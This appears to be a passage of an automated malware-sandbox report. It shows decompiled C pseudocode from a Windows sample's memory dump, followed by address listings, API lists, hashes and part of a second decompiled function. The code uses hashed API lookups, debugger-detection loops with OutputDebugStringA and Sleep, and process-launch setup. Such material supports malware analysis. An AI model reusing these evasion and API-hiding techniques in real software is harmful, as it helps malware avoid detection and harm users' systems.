							__eflags =  *(_t562 + 0x130);
							if( *(_t562 + 0x130) > 0) {
								 *_t562 = _t549;
								__eflags = 0;
								_t534 = _t562 + 0x130;
								while(1) {
									L52:
									_t327 = E004115C0(0xa1310f65, 0xf3af54a7);
									__eflags = _t327;
									if(_t327 != 0) {
										LoadLibraryW( *(E00427600(_t534, _t537))); // executed
									}
									_t328 =  *(_t562 + 0x130);
									while(1) {
										L55:
										_t537 = 1;
										__eflags = 1 - _t328;
										if(1 >= _t328) {
											break;
										}
										__eflags = 1 - 4;
										if(1 != 4) {
											goto L52;
										} else {
											_t508 =  *0x43b02a & 0x000000ff;
											__eflags = ( *0x43b02a & 0x000000ff) - 2;
											if(( *0x43b02a & 0x000000ff) == 2) {
												continue;
											} else {
												while(1) {
													L52:
													_t327 = E004115C0(0xa1310f65, 0xf3af54a7);
													__eflags = _t327;
													if(_t327 != 0) {
														LoadLibraryW( *(E00427600(_t534, _t537))); // executed
													}
													_t328 =  *(_t562 + 0x130);
													goto L55;
												}
											}
										}
										goto L60;
									}
									_t549 =  *_t562;
									goto L60;
								}
							}
							L60:
							__eflags =  *((intOrPtr*)(_t549 + 0x2c)) - 2;
							if( *((intOrPtr*)(_t549 + 0x2c)) != 2) {
								__eflags =  *0x43b028 & 0x000000ff;
								if(( *0x43b028 & 0x000000ff) == 0) {
									__eflags =  *0x43b265 & 0x000000ff;
									if(( *0x43b265 & 0x000000ff) == 0) {
										__eflags = E0043B1CC - 1;
										if(E0043B1CC != 1) {
											_t306 =  *0x43b1d0; // 0x7beaf0
											_t62 = _t306 + 4; // 0x0
											_t307 =  *_t62;
											_t508 =  *_t307 & 0x0000ffff;
											__eflags = ( *_t307 & 0x0000ffff) - 0x2d;
											if(( *_t307 & 0x0000ffff) != 0x2d) {
												E00418AB0(_t562 + 0xcc, _t307, 0);
												_push(0x80);
												_push(0);
												E0042A4E0(_t562 + 0x68, __eflags,  *((intOrPtr*)(_t562 + 0xd0)), 1);
												_t310 = E0042BEA0(_t562 + 0x64, _t508, _t537);
												__eflags = _t310;
												if(_t310 == 0) {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E0042BE30(_t562 + 0x64, _t537);
													}
													E00418CA0(_t562 + 0x58);
													_t540 = 0;
													__eflags = 0;
													while(1) {
														__eflags = E0042A730(_t562 + 0xc4, _t508);
														if(__eflags == 0) {
															break;
														}
														E004122A0(0x64, _t508);
														_t540 = _t540 + 1;
														__eflags = _t540 - 0x64;
														if(__eflags < 0) {
															continue;
														}
														break;
													}
													_t537 = _t562 + 0xcc;
													do {
														E0041AE80(_t562 + 0xcc, __eflags, _t537, 0x5c);
														E00418CC0(_t562 + 0xc8,  *(_t562 + 0xcc));
														E00418CA0(_t537);
														__eflags = E0042A730(_t562 + 0xc4, _t508);
													} while (__eflags == 0);
												} else {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E0042BE30(_t562 + 0x64, _t537);
													}
													E00418CA0(_t562 + 0x58);
												}
												E00418CA0(_t562 + 0xc4);
											}
										}
									}
								}
								__eflags = ( *0x43b02a & 0x000000ff) - 2;
								if(( *0x43b02a & 0x000000ff) == 2) {
									L89:
									_t215 =  *0x43b1ad; // 0x2491f30
									__eflags = _t215;
									if(_t215 == 0) {
										L91:
										_t216 =  *0x43b1ad; // 0x2491f30
										__eflags = _t216;
										if(_t216 == 0) {
											_push(0x10);
											_t217 = E00411030();
											_t562 = _t562 + 4;
											__eflags = _t217;
											if(_t217 != 0) {
												_push(0);
												_t218 = E00429350(_t217);
											} else {
												_t218 = 0;
											}
											 *0x43b1ad = _t218;
										}
										_t537 =  *0x43b1ad; // 0x2491f30
										__eflags = ( *0x43b02a & 0x000000ff) - 1;
										if(( *0x43b02a & 0x000000ff) == 1) {
											_t508 = 0x18f8c844;
											_t534 = _t562 + 0x28;
											E00406AD0(_t370, _t534, 0x18f8c844, _t534, _t537, 1, 0); // executed
											_push(_t534);
											E00429520(_t537);
											E00429510(_t534);
										} else {
											E00429710(_t537, 0x43b02d,  *0x43b02b & 0x0000ffff);
										}
									} else {
										_t455 =  *0x43b1ad; // 0x2491f30
										_t280 = E00429660(_t455);
										__eflags = _t280;
										if(_t280 != 0) {
											goto L91;
										}
									}
									_t223 =  *0x43b1b1; // 0x0
									__eflags = _t223;
									if(_t223 == 0) {
										L97:
										_t224 =  *0x43b1b1; // 0x0
										__eflags = _t224;
										if(_t224 == 0) {
											_push(0x10);
											_t225 = E00411030();
											_t562 = _t562 + 4;
											__eflags = _t225;
											if(_t225 != 0) {
												_push(0);
												_t226 = E00429350(_t225);
											} else {
												_t226 = 0;
											}
											 *0x43b1b1 = _t226;
										}
										_t534 =  *0x43b1b1; // 0x0
										__eflags = ( *0x43b02a & 0x000000ff) - 1;
										if(( *0x43b02a & 0x000000ff) == 1) {
											_t508 = 0x11041f01;
											E00406AD0(_t370, _t562 + 0x38, 0x11041f01, _t534, _t537, 1, 1);
											_push(_t562 + 0x38);
											E00429520(_t534);
											E00429510(_t562 + 0x38);
											_t233 = E00429650(_t534);
											__eflags = _t233;
											if(_t233 != 0) {
												_t508 = 0xd3ef7577;
												E00406AD0(_t370, _t562 + 8, 0xd3ef7577, _t534, _t537, 0, 0);
												E00429510(_t562);
											}
										} else {
											_t537 =  *0x43b1c4; // 0x400000
											__eflags =  *((char*)(E00413930(_t370, 0, _t534, _t537) + 0xb)) - 0x20;
											_t517 =  ==  ? 0x7e839a6 : 0x93fc68d6;
											_t508 = _t537;
											E00409090(_t562 + 0x88, _t537,  ==  ? 0x7e839a6 : 0x93fc68d6);
											_push(_t562 + 0x88);
											E00429520(_t534);
											E00429510(_t562 + 0x88);
										}
									} else {
										_t453 =  *0x43b1b1; // 0x0
										_t276 = E00429660(_t453);
										__eflags = _t276;
										if(_t276 != 0) {
											goto L97;
										}
									}
									_t234 =  *((intOrPtr*)(_t549 + 0x2c));
									__eflags = _t234 - 3;
									if(_t234 == 3) {
										__eflags = E0043B1CC - 3;
										if(E0043B1CC == 3) {
											_t235 =  *0x43b1d0; // 0x7beaf0
											_t146 = _t235 + 8; // 0x3a0043
											E00418CC0(_t562 + 0x10c,  *_t146);
										}
										_t371 = _t562 + 0x48;
										E00418810(_t562 + 0x48, 0);
										_t238 = E00419890(_t371, _t562 + 0x48, _t508, _t534, _t537, _t371, 0x439428,  *((intOrPtr*)(_t549 + 0x2c)));
										E00420220(_t562 + 0x110,  *_t238, 0);
										E00418CA0(_t371);
										E00408180(_t537);
									} else {
										__eflags = _t234 - 5;
										if(_t234 != 5) {
											__eflags = _t234 - 6;
											if(__eflags == 0) {
												_t430 = _t562 + 0xa4;
												 *_t430 = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												 *((intOrPtr*)(_t430 + 8)) = 0;
												 *((intOrPtr*)(_t430 + 0xc)) = 0;
												E00415B60(_t370, _t430, _t534, _t537, __eflags);
												E00406740(_t562 + 0xa4);
												E00411350(0x12);
												__eflags =  *(_t562 + 0xa8);
												if( *(_t562 + 0xa8) > 0) {
													_t373 = 0;
													__eflags = 0;
													do {
														_t253 = E00432B00(_t562 + 0xa8, _t373);
														__eflags =  *((char*)(_t253 + 0x3c));
														if( *((char*)(_t253 + 0x3c)) == 0) {
															E00402A40(_t562 + 0x50, _t253);
															E00418CA0(_t562 + 0x50);
														}
														_t373 = _t373 + 1;
														__eflags = _t373 -  *(_t562 + 0xa8);
													} while (_t373 <  *(_t562 + 0xa8));
												}
												E00432970(_t370, _t562 + 0xa4, _t534);
												_t434 =  *(_t562 + 0xb0);
												__eflags =  *(_t562 + 0xb0);
												if( *(_t562 + 0xb0) != 0) {
													E00402A20(_t434, 1);
												}
											}
										} else {
											__eflags = _t370;
											if(_t370 == 0) {
												__eflags = E0043B1CC - 1;
												if(__eflags <= 0) {
													L106:
													_t438 = _t562 + 0x18;
													 *_t438 = 0;
													 *((intOrPtr*)(_t438 + 4)) = 0;
													 *((intOrPtr*)(_t438 + 8)) = 0;
													 *((intOrPtr*)(_t438 + 0xc)) = 0;
													E00415B60(_t370, _t438, _t534, _t537, __eflags);
													__eflags = ( *0x43b029 & 0x000000ff) - 1;
													E00407DB0(_t562 + 0x18, 0 | ( *0x43b029 & 0x000000ff) - 0x00000001 > 0x00000000);
													__eflags =  *0x43b029 & 0x000000ff;
													if(( *0x43b029 & 0x000000ff) != 0) {
														E00411350(0x12);
														__eflags =  *(_t562 + 0x1c);
														if( *(_t562 + 0x1c) > 0) {
															_t374 = 0;
															__eflags = 0;
															do {
																_t263 = E00432B00(_t562 + 0x1c, _t374);
																__eflags =  *((char*)(_t263 + 0x3c));
																if( *((char*)(_t263 + 0x3c)) == 0) {
																	E00402A40(_t562 + 0x10, _t263);
																	E00418CA0(_t562 + 0x10);
																}
																_t374 = _t374 + 1;
																__eflags = _t374 -  *(_t562 + 0x1c);
															} while (_t374 <  *(_t562 + 0x1c));
														}
													}
													E00432970(_t370, _t562 + 0x18, _t534);
													_t441 =  *(_t562 + 0x24);
													__eflags =  *(_t562 + 0x24);
													if( *(_t562 + 0x24) != 0) {
														E00402A20(_t441, 1);
													}
												} else {
													_t266 =  *0x43b1d0; // 0x7beaf0
													_t105 = _t266 + 4; // 0x0
													__eflags = ( *( *_t105) & 0x0000ffff) - 0x2d;
													if(__eflags != 0) {
														goto L106;
													}
												}
											}
										}
									}
									E00428910(_t562 + 0x130, _t534, _t537);
									E00418CA0(_t562 + 0x110);
									E00418CA0(_t562 + 0x108);
									E00417A70(_t562 + 0x128);
									__eflags = 0;
									return 0;
								} else {
									__eflags =  *0x43b027 & 0x000000ff;
									if(( *0x43b027 & 0x000000ff) == 0) {
										goto L89;
									} else {
										__eflags = _t370;
										if(_t370 != 0) {
											goto L89;
										} else {
											__eflags =  *((char*)(_t549 + 0xb)) - 0x20;
											_t519 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
											E004061B0(_t562 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t549 + 0xb)) - 0x20);
											E00418810(_t562 + 0x18, 0x200);
											_t458 = E004115C0(0xa1310f65, 0xc4d11e8a);
											__eflags = _t458;
											if(__eflags != 0) {
												_t303 =  *(_t562 + 0x18) >> 1;
												__eflags = _t303;
												_t519 =  *0x43b1c4; // 0x400000
												 *_t458(_t519,  *(_t562 + 0x18), _t303);
											}
											_push(0x80);
											_push(0);
											E0042A4E0(_t562 + 0x10, __eflags,  *((intOrPtr*)(_t562 + 0x20)), 1);
											E0042A520(_t562 + 8, _t519, _t562 + 0x1c, 0);
											__eflags =  *((char*)(_t562 + 0x10));
											if( *((char*)(_t562 + 0x10)) != 0) {
												E0042BE30(_t562 + 0xc, _t537);
											}
											__eflags = 0;
											E00418CA0(_t562);
											_t539 = _t562 + 0x1a0;
											_t552 = _t562 + 0x2c;
											while(1) {
												E00410B70(_t539, 0, 0x44);
												 *((intOrPtr*)(_t562 + 0x1ac)) = 0x44;
												E00410B70(_t552, 0, 0x10);
												_t562 = _t562 + 0x18;
												E00418810(_t562 + 0x4c, 0);
												_t295 = E004196D0(E004196D0(E00420220(_t562 + 0x50,  *((intOrPtr*)(_t562 + 0x40)), 0), 0x20), 0x22);
												_t296 =  *0x43b1d0; // 0x7beaf0
												E004196D0(E00420220(_t295,  *_t296, 0), 0x22);
												_t299 = E004115C0(0xa1310f65, 0x643f303c);
												__eflags = _t299;
												if(_t299 != 0) {
													break;
												}
												E00418CA0(_t562 + 0x48);
											}
											_push(_t552);
											_push(_t539);
											_push(0);
											_push(0);
											_push(4);
											_push(0);
											_push(0);
											_push(0);
											_push( *((intOrPtr*)(_t562 + 0x68)));
											_push( *((intOrPtr*)(_t562 + 0x60)));
											asm("int3");
											return _t299;
										}
									}
								}
							} else {
								E00428910(_t562 + 0x130, _t533, _t537);
								E00418CA0(_t562 + 0x110);
								E00418CA0(_t562 + 0x108);
								E00417A70(_t562 + 0x128);
								__eflags = 0;
								return 0;
							}
						} else {
							_push( &E0043B1CC);
							_push(0);
							asm("int3");
							return _t186;
						}
					} else {
						asm("int3");
						return _t184;
					}
				} else {
					asm("int3");
					return _t173;
				}
				L145:
			}

0x00405150
0x00405151
0x00405154
0x0040515a
0x00405163
0x00405172
0x00405179
0x0040517f
0x00405184
0x00405189
0x0040518e
0x00405193
0x0040519f
0x004051a1
0x004051b7
0x004051bc
0x004051bc
0x004051be
0x004051c5
0x004051c5
0x004051d0
0x004051dc
0x004051e4
0x004051ec
0x004051f1
0x004051f2
0x004051f8
0x00000000
0x00000000
0x00000000
0x00000000
0x004051fa
0x004051fa
0x004051fa
0x00405200
0x00000000
0x00000000
0x00405202
0x00405203
0x00405209
0x00000000
0x0040520b
0x00405212
0x00405212
0x00000000
0x00405209
0x004051fa
0x00405218
0x00405218
0x00405218
0x0040521a
0x00405221
0x00405221
0x0040522c
0x00405238
0x00405240
0x00405248
0x0040524d
0x0040524e
0x00405254
0x00000000
0x00000000
0x00000000
0x00000000
0x00405256
0x00405256
0x00405256
0x0040525c
0x00000000
0x00000000
0x0040525e
0x0040525f
0x00405265
0x00000000
0x00405267
0x0040526e
0x0040526e
0x00000000
0x00405265
0x00405256
0x00405274
0x00405274
0x00405274
0x00405276
0x0040527d
0x0040527d
0x00405288
0x00405294
0x0040529c
0x004052a4
0x004052a9
0x004052aa
0x004052b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004052b2
0x004052b2
0x004052b2
0x004052b8
0x00000000
0x00000000
0x004052ba
0x004052bb
0x004052c1
0x00000000
0x004052c3
0x004052ca
0x004052ca
0x00000000
0x004052c1
0x004052b2
0x004052d0
0x004052d0
0x004052d0
0x004052d2
0x004052d9
0x004052d9
0x004052e4
0x004052f0
0x004052f8
0x00405300
0x00405305
0x00405306
0x0040530c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040530e
0x0040530e
0x0040530e
0x00405314
0x00000000
0x00000000
0x00405316
0x00405317
0x0040531d
0x00000000
0x0040531f
0x00405326
0x00405326
0x00000000
0x0040531d
0x0040530e
0x0040532c
0x00405333
0x00405333
0x00405338
0x0040533d
0x00405342
0x00405344
0x00405350
0x00405355
0x00405358
0x00405efb
0x00405efb
0x00405f04
0x00405f06
0x00405f08
0x00405f22
0x00405f22
0x00405f2f
0x00405f34
0x00405f3b
0x00405f43
0x00405f4a
0x00405f4e
0x00405f52
0x00405f52
0x00405f54
0x00405f61
0x00405f67
0x00405f69
0x00405f6b
0x00000000
0x00000000
0x00405f75
0x00405f7f
0x00405f8a
0x00405f8c
0x00405f97
0x00405f97
0x00405fa9
0x00405fab
0x00405fad
0x00405fbd
0x00405fd0
0x00405fd0
0x00405fe1
0x00405fe4
0x00405fec
0x00405fee
0x00405ff0
0x00405ffd
0x00406017
0x00406017
0x00405ff0
0x00000000
0x00405f0a
0x00405f18
0x00405f1a
0x00405f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f1c
0x00000000
0x00405f08
0x00405358
0x0040535e
0x0040535e
0x00405368
0x0040536f
0x00405377
0x0040538a
0x0040539b
0x0040539d
0x0040539f
0x004053aa
0x004053aa
0x004053ac
0x004053ae
0x004053b0
0x004053ba
0x004053cb
0x004053cd
0x004053cf
0x004053cf
0x004053d4
0x004053d7
0x004053d7
0x004053ba
0x004053e2
0x004053f0
0x004053fc
0x0040540b
0x00405410
0x00405412
0x0040541c
0x00405428
0x0040542d
0x0040542f
0x00405440
0x00405451
0x00405453
0x00405457
0x00405459
0x00405459
0x0040545e
0x0040546f
0x00405483
0x00405485
0x00405487
0x00405490
0x00405490
0x0040549c
0x0040549c
0x004054a5
0x004054b8
0x004054bd
0x004054bf
0x004054d9
0x004054ec
0x004054f1
0x004054f3
0x00405506
0x0040550b
0x0040551c
0x00405525
0x00405538
0x00405546
0x00405552
0x00405563
0x0040556a
0x00405576
0x00405589
0x00405590
0x00405599
0x00405599
0x00405599
0x0040559c
0x004054f5
0x004054f5
0x004054f5
0x004055a8
0x004055b4
0x004055b9
0x004055bb
0x004055c4
0x004055c4
0x00000000
0x00000000
0x00000000
0x004054c1
0x004054c8
0x004055bd
0x004055bd
0x004055bd
0x004055d2
0x004055e8
0x004055f4
0x004055f9
0x00405601
0x00405603
0x00405606
0x00405608
0x0040560f
0x0040560f
0x00405619
0x00405620
0x00405622
0x0040562e
0x0040562e
0x00405630
0x00405637
0x00405637
0x00405637
0x00405638
0x0040563a
0x00000000
0x00000000
0x0040563c
0x0040563f
0x00000000
0x00405641
0x00405641
0x00405648
0x0040564b
0x00000000
0x0040564d
0x0040560f
0x0040560f
0x00405619
0x00405620
0x00405622
0x0040562e
0x0040562e
0x00405630
0x00000000
0x00405630
0x0040560f
0x0040564b
0x00000000
0x0040563f
0x0040564f
0x00000000
0x0040564f
0x0040560f
0x00405652
0x00405652
0x00405656
0x0040569c
0x0040569e
0x004056ab
0x004056ad
0x004056b3
0x004056ba
0x004056c0
0x004056c5
0x004056c5
0x004056c8
0x004056cb
0x004056ce
0x004056de
0x004056e3
0x004056e8
0x004056f7
0x00405700
0x00405705
0x00405707
0x00405724
0x00405729
0x0040572f
0x0040572f
0x00405738
0x0040573d
0x0040573d
0x0040573f
0x0040574b
0x0040574d
0x00000000
0x00000000
0x00405754
0x00405759
0x0040575a
0x0040575d
0x00000000
0x00000000
0x00000000
0x0040575d
0x0040575f
0x00405766
0x00405770
0x00405783
0x0040578a
0x0040579b
0x0040579b
0x00405709
0x00405709
0x0040570e
0x00405714
0x00405714
0x0040571d
0x0040571d
0x004057a6
0x004057a6
0x004056ce
0x004056ba
0x004056ad
0x004057b2
0x004057b5
0x00405b3c
0x00405b3c
0x00405b41
0x00405b43
0x00405b54
0x00405b54
0x00405b59
0x00405b5b
0x00405e33
0x00405e35
0x00405e3a
0x00405e3d
0x00405e3f
0x00405e47
0x00405e49
0x00405e41
0x00405e41
0x00405e41
0x00405e4e
0x00405e4e
0x00405b61
0x00405b6e
0x00405b71
0x00405e0b
0x00405e10
0x00405e1a
0x00405e21
0x00405e22
0x00405e29
0x00405b77
0x00405b86
0x00405b86
0x00405b45
0x00405b45
0x00405b4b
0x00405b50
0x00405b52
0x00000000
0x00000000
0x00405b52
0x00405b92
0x00405b97
0x00405b99
0x00405baa
0x00405baa
0x00405baf
0x00405bb1
0x00405eb0
0x00405eb2
0x00405eb7
0x00405eba
0x00405ebc
0x00405ec4
0x00405ec6
0x00405ebe
0x00405ebe
0x00405ebe
0x00405ecb
0x00405ecb
0x00405bb7
0x00405bc4
0x00405bc7
0x00405e62
0x00405e68
0x00405e73
0x00405e74
0x00405e7d
0x00405e84
0x00405e89
0x00405e8b
0x00405e93
0x00405e9e
0x00405ea6
0x00405ea6
0x00405bcd
0x00405bcf
0x00405be8
0x00405bf1
0x00405bf5
0x00405bf7
0x00405c05
0x00405c06
0x00405c12
0x00405c12
0x00405b9b
0x00405b9b
0x00405ba1
0x00405ba6
0x00405ba8
0x00000000
0x00000000
0x00405ba8
0x00405c1e
0x00405c21
0x00405c24
0x00405d87
0x00405d8e
0x00405ed5
0x00405eda
0x00405ee4
0x00405ee4
0x00405d94
0x00405d9c
0x00405daa
0x00405dbd
0x00405dc4
0x00405dc9
0x00405c2a
0x00405c2a
0x00405c2d
0x00405cf0
0x00405cf3
0x00405cfb
0x00405d02
0x00405d04
0x00405d07
0x00405d0a
0x00405d0d
0x00405d1b
0x00405d25
0x00405d2a
0x00405d32
0x00405d34
0x00405d34
0x00405d36
0x00405d3e
0x00405d43
0x00405d47
0x00405d4f
0x00405d58
0x00405d58
0x00405d5d
0x00405d5e
0x00405d5e
0x00405d36
0x00405d6e
0x00405d73
0x00405d7a
0x00405d7c
0x00405d80
0x00405d80
0x00405d7c
0x00405c33
0x00405c33
0x00405c35
0x00405c3b
0x00405c42
0x00405c58
0x00405c5a
0x00405c5e
0x00405c60
0x00405c63
0x00405c66
0x00405c69
0x00405c77
0x00405c81
0x00405c8d
0x00405c8f
0x00405c96
0x00405c9b
0x00405ca0
0x00405ca2
0x00405ca2
0x00405ca4
0x00405ca9
0x00405cae
0x00405cb2
0x00405cba
0x00405cc3
0x00405cc3
0x00405cc8
0x00405cc9
0x00405cc9
0x00405ca4
0x00405ca0
0x00405cd3
0x00405cd8
0x00405cdc
0x00405cde
0x00405ce6
0x00405ce6
0x00405c44
0x00405c44
0x00405c49
0x00405c4f
0x00405c52
0x00000000
0x00000000
0x00405c52
0x00405c42
0x00405c35
0x00405c2d
0x00405dd5
0x00405de1
0x00405ded
0x00405df9
0x00405dfe
0x00405e0a
0x004057bb
0x004057c2
0x004057c4
0x00000000
0x004057ca
0x004057ca
0x004057cc
0x00000000
0x004057d2
0x004057dc
0x004057e4
0x004057e7
0x004057f5
0x00405809
0x0040580b
0x0040580d
0x00405813
0x00405813
0x0040581a
0x00405821
0x00405821
0x00405823
0x00405828
0x00405834
0x00405844
0x00405849
0x0040584e
0x00405854
0x00405854
0x00405859
0x0040585e
0x00405863
0x0040586a
0x0040586e
0x00405873
0x00405878
0x00405888
0x0040588d
0x00405896
0x004058b7
0x004058be
0x004058d0
0x004058df
0x004058e4
0x004058e6
0x00000000
0x00000000
0x00405996
0x00405996
0x004058ec
0x004058ed
0x004058ee
0x004058ef
0x004058f0
0x004058f2
0x004058f3
0x004058f4
0x004058f5
0x004058f9
0x004058fd
0x004058fe
0x004058fe
0x004057cc
0x004057c4
0x00405658
0x0040565f
0x0040566b
0x00405677
0x00405683
0x00405688
0x00405694
0x00405694
0x00405431
0x00405431
0x00405436
0x00405437
0x00405438
0x00405438
0x00405414
0x00405414
0x00405415
0x00405415
0x0040517b
0x0040517b
0x0040517c
0x0040517c
0x00000000

APIs

OutputDebugStringA.KERNEL32(?,00000014,00000050,00000028,00000064,A1310F65,755128FE,00000001), ref: 004051DC
Sleep.KERNEL32(0000000A), ref: 004051E4
OutputDebugStringA.KERNEL32(?), ref: 00405212
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00405238
Sleep.KERNEL32(0000000A), ref: 00405240
OutputDebugStringA.KERNEL32(?), ref: 0040526E
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00405294
Sleep.KERNEL32(0000000A), ref: 0040529C
OutputDebugStringA.KERNEL32(?), ref: 004052CA
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 004052F0
Sleep.KERNEL32(0000000A), ref: 004052F8

Strings

D, xrefs: 00405878
@, xrefs: 00405F8C
, xrefs: 004057DC

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DebugOutputString$Sleep
String ID: $@$D
API String ID: 3789842296-3631221151
Opcode ID: a7ba892076777305c3c89cd4521cb239747012855f76f3f1b6168463b79cc2d4
Instruction ID: 274a30241bc29f0c1ce2d61f467b565d5e3bd29d6194fda7ddb9a2ba02606c7f
Opcode Fuzzy Hash: a7ba892076777305c3c89cd4521cb239747012855f76f3f1b6168463b79cc2d4
Instruction Fuzzy Hash: 3862D5302083459AD724EB21CC51BEF77E5EF80348F40443EF686A62D2EF789945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00413930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x43b1f0; // 0x2490528
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E00411030();
					_t444 = _t444 + 4;
					 *0x43b1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E00410B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x43b1f4; // 0x2491340
					_v432 = 0x11c;
					if(_t377 == 0xc139578) {
						 *0x43b1f4 = 0;
						_t314 = 0;
						goto L11;
					} else {
						if(_t377 == 0) {
							_t314 = 0;
							goto L11;
						} else {
							_t314 = 0;
							do {
								_t375 = _t314;
								_t311 = _t375;
								while( *((intOrPtr*)(_t311 + _t377 + 8)) != 0x13e99f60) {
									_t375 = _t375 + 1;
									_t311 = _t311 + 0x18;
									if(_t375 < 0x10) {
										continue;
									} else {
										goto L10;
									}
									goto L236;
								}
								_t308 =  *((intOrPtr*)(_t311 + _t377 + 0x14));
								if(_t308 != 0) {
									L14:
									if(_t308 == 0) {
										L16:
										_t417 =  *0x43b1f0; // 0x2490528
										_t378 = _v432;
										_t322 = _v428;
										 *((intOrPtr*)(_t417 + 4)) = _v424;
										_t428 = (_t378 & 0x000000ff) << 4;
										 *(_t417 + 9) = _t322;
										 *(_t417 + 8) = _t378;
										 *((char*)(_t417 + 0xa)) = _v160 & 0x0000ffff;
										_t380 =  !=  ? 1 : _t314;
										 *((char*)(_t417 + 0xc)) =  !=  ? 1 : _t314;
										_t381 =  *0x43b1f4; // 0x2491340
										_v32 = _t314;
										 *_t417 = (_t322 & 0x000000ff) + ((_t378 & 0x000000ff) << 4) - 0x50;
										if(_t381 == 0xc139578) {
											 *0x43b1f4 = 0;
											goto L22;
										} else {
											if(_t381 == 0) {
												L22:
												_push(0xa1310f65);
												_t428 = E00417564(0xa1310f65);
												if(_t428 == 0) {
													if(E00416C50(0xa1310f65) != 0) {
														_push(0xa1310f65);
														_t428 = E00417564(0xa1310f65);
													}
												}
												if(_t428 != 0) {
													_t445 = _t445 + 0xfffffff8;
													_t413 = E004167C8(_t428, 0x16ea6870);
													goto L25;
												}
											} else {
												do {
													_t374 = _t314;
													_t306 = _t374;
													while( *((intOrPtr*)(_t306 + _t381 + 8)) != 0x16ea6870) {
														_t374 = _t374 + 1;
														_t306 = _t306 + 0x18;
														if(_t374 < 0x10) {
															continue;
														} else {
															goto L21;
														}
														goto L27;
													}
													_t413 =  *((intOrPtr*)(_t306 + _t381 + 0x14));
													if(_t413 != 0) {
														L25:
														if(_t413 != 0) {
															 *_t413(0xffffffff,  &_v44);
														}
														goto L27;
													} else {
														goto L22;
													}
													goto L236;
													L21:
													asm("o16 nop [eax+eax]");
													_t22 = _t381 + 0x180; // 0x2498fa8
													_t381 =  *_t22;
												} while (_t381 != 0);
												goto L22;
											}
										}
										L27:
										_t174 =  *0x43b1f0; // 0x2490528
										if(_v36 == 0) {
											 *((char*)(_t174 + 0xb)) = 0x20;
										} else {
											 *((char*)(_t174 + 0xb)) = 0x40;
										}
										_t175 = E004147B0(_t314, _t417, _t428);
										_t382 =  *0x43b1f0; // 0x2490528
										 *((char*)(_t382 + 0x28)) = _t175;
										if( *((intOrPtr*)(E00413930(_t314, 0, _t417, _t428))) >= 0x10) {
											asm("movups xmm0, [0x43a130]");
											asm("movsd xmm1, [0x43a140]");
											asm("movups [esp+0x130], xmm0");
											asm("movsd [esp+0x140], xmm1");
											_t418 =  &_v120;
											_push(0);
											E00429350( &_v120);
											_t429 = _t314;
											do {
												E00429670( &_v120, E00429650( &_v120) + 4);
												_t315 =  *((intOrPtr*)(_t445 + 0x130 + _t429 * 4));
												_t183 = E00429640(_t418, E00429650(_t418) + 0xfffffffc);
												_t429 = 1 + _t429;
												 *_t183 = _t315;
											} while (_t429 < 6);
											_push(0);
											_t314 = 0;
											E0042C550(0,  &_v160, _t429, _t439, _t418, 0x80000002);
											E00429510(_t418);
											E0042C580( &_v172, _t382,  &_v84, 0x1cd1a4f3);
											_push(_v92);
											_t187 = E0042C790( &_v180, _t382);
											_t419 = _t187;
